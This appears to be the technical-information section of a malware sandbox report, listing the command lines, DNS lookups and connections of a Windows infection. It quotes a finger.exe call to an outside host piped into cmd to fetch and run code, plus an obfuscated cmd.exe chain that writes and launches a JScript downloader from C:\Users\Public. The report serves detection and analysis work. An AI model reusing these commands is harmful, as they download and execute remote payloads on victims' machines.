Technical Information
- '<SYSTEM32>\finger.exe' ok@ta365shoo4m.pilhamenth.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\XCm.js"
- C:\users\public\xcm.js
- 'ta#######4m.pilhamenth.email':79
- '96######esu.locaster.live':80
- 'ta#######4m.pilhamenth.email':79
- DNS ASK ta#######4m.pilhamenth.email
- DNS ASK 96######esu.locaster.live
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@ta365shoo4m.pilhamenth.email |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set THTA=.j&&sET PKMAQ=vPh2parPh2p a =Ph2p 'scPh2priPh2pptPh2p:'; b =Ph2p 'hPh2pTtPPh2p:'; GPh2petPh2pObjPh2pecPh2pt(Ph2pa+b+'&&sET 40JI=OTMLKOTMLK961dkrcaesu.locaster.liveOTMLK?1OTMLK'...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 3WCAW="%PKMAQ:Ph2p=%%40JI:OTMLK=/%" 0<nul 1>C:\Users\Public\XCm%THTA%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\XCm%THTA%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\XCm.js